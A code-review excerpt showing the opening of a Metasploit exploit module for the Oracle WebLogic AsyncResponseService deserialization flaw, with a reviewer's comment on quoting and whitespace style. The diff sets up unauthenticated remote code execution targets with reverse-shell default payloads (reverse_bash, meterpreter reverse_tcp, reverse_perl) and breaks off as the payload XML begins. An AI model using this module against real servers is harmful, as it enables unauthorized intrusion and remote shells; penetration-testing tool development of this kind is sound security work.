modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb

```diff
@@ -0,0 +1,170 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/powershell'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ',
+      'Description' => %q{
+        An unauthenticated attacker with network access to the Oracle Weblogic Server T3
+        interface can send a malicious SOAP request to the interface WLS AsyncResponseService
+        to execute code on the vulnerable host.
+      },
+      'Author' =>
+        [
+        'Andres Rodriguez',  # Metasploit Module - 2Secure (@acamro, acamro[at]gmail.com)
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          ['CNVD-C', '2019-48814'],
+          ['URL', 'http://www.cnvd.org.cn/webinfo/show/4999']
+        ],
+      'Privileged' => false,
+      'Platform' => %w{ unix win solaris },
+      'Targets' =>
+        [
+          [ 'Unix',
+            'Platform' => 'unix',
+            'Arch' => [ARCH_CMD],
+            'DefaultOptions' => {
+              'PAYLOAD' => 'cmd/unix/reverse_bash'
+            }
+          ],
+          [ 'Windows',
+            'Platform' => 'win',
+            'Payload' => {},
+	    'Arch' => [ARCH_X64, ARCH_X86],
+            'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}
+          ],
+          [ 'Solaris',
+            'Platform' => 'solaris',
+            'Arch' => ARCH_CMD,
+            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},
+            'Payload' => {
+              'Space'       => 2048,
+              'DisableNops' => true,
+              'Compat'      =>
+                {
+                  'PayloadType' => 'cmd',
+                  'RequiredCmd' => 'generic perl telnet',
+                }
+            }
+          ]
+        ],
+      'DefaultTarget' => 0,
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 12
+        },
+      'DisclosureDate' => 'Apr 23 2019'))
+
+    register_options(
+      [
+        Opt::RPORT(7001),
+	OptString.new('RHOSTS', [false]),
+        OptString.new('URIPATH', [true, 'URL to the weblogic instance', '']),
+        OptString.new('WSPATH', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService'])
+      ]
+    )
+  end
+
+  def send_payload
+    uri = normalize_uri(datastore['WSPATH'])
+
+    print_status("Generating payload...")
+    # payload creation
+    if target.name == 'Windows'
+      xml_cmd = "          <void index=\"0\"> "

```

Comment:
Using single quotes `'` would save some escaping, as double quotes `"` are not required.

Also it is unlikely that whitespace is required. This data could be compressed into one or two lines, while maintaining readability.